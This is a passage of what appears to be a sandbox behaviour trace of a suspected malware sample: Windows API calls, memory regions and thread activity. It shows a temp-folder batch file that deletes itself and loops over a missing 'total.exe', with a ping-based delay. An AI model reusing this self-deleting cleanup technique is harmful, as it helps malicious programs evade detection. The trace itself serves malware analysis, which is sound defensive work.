_ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.020] GetFileType (hFile=0x7) returned 0x2 [0165.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.020] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.021] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0165.021] FindFirstFileExW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", fInfoLevelId=0x1, lpFindFileData=0x3fea14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea14) returned 0xffffffff [0165.021] GetLastError () returned 0x2 [0165.021] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0165.021] GetLastError () returned 0x6 [0165.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.021] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.021] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.022] SetConsoleInputExeNameW () returned 0x1 [0165.022] GetConsoleOutputCP () returned 0x1b5 [0165.022] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.022] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.022] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.022] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.022] SetFilePointer (in: hFile=0x78, lDistanceToMove=150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.023] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.023] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.023] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0x30, lpOverlapped=0x0) returned 1 [0165.023] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=48, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\ntal.exe goto try\r\n") returned 48 [0165.024] _tell (_FileHandle=3) returned 198 [0165.024] _close (_FileHandle=3) returned 0 [0165.024] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.024] GetFileType (hFile=0x7) returned 0x2 [0165.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.025] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.025] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.025] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.025] GetFileType (hFile=0x7) returned 0x2 [0165.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.026] GetFileType (hFile=0x7) returned 0x2 [0165.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x792348*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x792348*, lpNumberOfCharsWritten=0x3ff0d0*=0x3) returned 1 [0165.027] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat ") returned 44 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] GetFileType (hFile=0x7) returned 0x2 [0165.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x2c) returned 1 [0165.028] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.028] GetFileType (hFile=0x7) returned 0x2 [0165.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.028] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0165.029] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0165.029] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0165.029] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0165.029] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x3fdce8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0165.029] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0165.029] _wcsicmp (_String1="1.bat", _String2=".") returned 3 [0165.029] _wcsicmp (_String1="1.bat", _String2="..") returned 3 [0165.029] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat")) returned 0x2020 [0165.030] DeleteFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat")) returned 1 [0165.031] FindNextFileW (in: hFindFile=0x798f08, lpFindFileData=0x798704 | out: lpFindFileData=0x798704) returned 0 [0165.031] GetLastError () returned 0x12 [0165.031] FindClose (in: hFindFile=0x798f08 | out: hFindFile=0x798f08) returned 1 [0165.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.032] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.032] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.032] SetConsoleInputExeNameW () returned 0x1 [0165.032] GetConsoleOutputCP () returned 0x1b5 [0165.032] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.032] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.032] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.033] GetLastError () returned 0x2 [0165.033] _get_osfhandle (_FileHandle=2) returned 0xb [0165.033] GetFileType (hFile=0xb) returned 0x2 [0165.033] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0165.033] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x3ff05c | out: lpMode=0x3ff05c) returned 1 [0165.033] _get_osfhandle (_FileHandle=2) returned 0xb [0165.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x3ff090 | out: lpConsoleScreenBufferInfo=0x3ff090) returned 1 [0165.033] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4ac44640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0165.034] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b4*=0x21) returned 1 [0165.034] CmdBatNotification () returned 0x1 [0165.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.034] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.035] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.035] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.035] SetConsoleInputExeNameW () returned 0x1 [0165.035] GetConsoleOutputCP () returned 0x1b5 [0165.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.035] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.035] exit (_Code=1) Process: id = "9" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x19964000" os_pid = "0x72c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xcc" cmd_line = "ping localhost -n 2 " cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1179 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1180 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1181 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1182 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1183 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1184 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1185 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1186 start_va = 0xcf0000 end_va = 0xcf7fff entry_point = 0xcf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1187 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1188 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1189 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1190 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1191 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1192 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1193 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1194 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1195 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1196 start_va = 0xa0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1197 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1198 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1199 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1200 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1201 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1202 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1203 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1204 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1205 start_va = 0x75730000 end_va = 0x75736fff entry_point = 0x75730000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1206 start_va = 0x75740000 end_va = 0x7575bfff entry_point = 0x75740000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1207 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1208 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1209 start_va = 0x75a00000 end_va = 0x75a05fff entry_point = 0x75a00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1210 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1211 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1212 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1213 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1214 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1215 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1216 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1217 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1218 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1219 start_va = 0x778f0000 end_va = 0x77924fff entry_point = 0x778f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1220 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1221 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1222 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1223 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1224 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1225 start_va = 0x3d0000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1226 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1227 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1261 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1262 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1263 start_va = 0x80000 end_va = 0x82fff entry_point = 0x80000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 1264 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1265 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1266 start_va = 0x560000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1267 start_va = 0xd00000 end_va = 0x20fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 1268 start_va = 0x6f0000 end_va = 0x9befff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1269 start_va = 0x75690000 end_va = 0x756cbfff entry_point = 0x75690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1270 start_va = 0x360000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1271 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1286 start_va = 0x75680000 end_va = 0x75685fff entry_point = 0x75680000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1291 start_va = 0x751f0000 end_va = 0x75233fff entry_point = 0x751f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1297 start_va = 0x9c0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1299 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1300 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1301 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1303 start_va = 0x750b0000 end_va = 0x750b5fff entry_point = 0x750b0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1364 start_va = 0x75060000 end_va = 0x75097fff entry_point = 0x75060000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1701 start_va = 0xaf0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1925 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1926 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1927 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 1928 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1955 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1956 start_va = 0x2160000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1957 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 62 os_tid = 0x3ac [0161.114] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb1c | out: lpSystemTimeAsFileTime=0x1efb1c*(dwLowDateTime=0x62347eb0, dwHighDateTime=0x1d4406f)) [0161.114] GetCurrentProcessId () returned 0x72c [0161.114] GetCurrentThreadId () returned 0x3ac [0161.114] GetTickCount () returned 0x308e5 [0161.114] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb14 | out: lpPerformanceCount=0x1efb14*=27932922601) returned 1 [0161.124] GetModuleHandleA (lpModuleName=0x0) returned 0xcf0000 [0161.124] __set_app_type (_Type=0x1) [0161.125] __p__fmode () returned 0x75c631f4 [0161.125] __p__commode () returned 0x75c631fc [0161.127] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xcf2ae1) returned 0x0 [0161.129] __getmainargs (in: _Argc=0xcf50d4, _Argv=0xcf50dc, _Env=0xcf50d8, _DoWildCard=0, _StartInfo=0xcf50e8 | out: _Argc=0xcf50d4, _Argv=0xcf50dc, _Env=0xcf50d8) returned 0 [0161.129] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.129] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.129] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xcf5440 | out: lpWSAData=0xcf5440) returned 0 [0161.140] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef5ac | out: phkResult=0x1ef5ac*=0x7c) returned 0x0 [0161.140] RegQueryValueExA (in: hKey=0x7c, 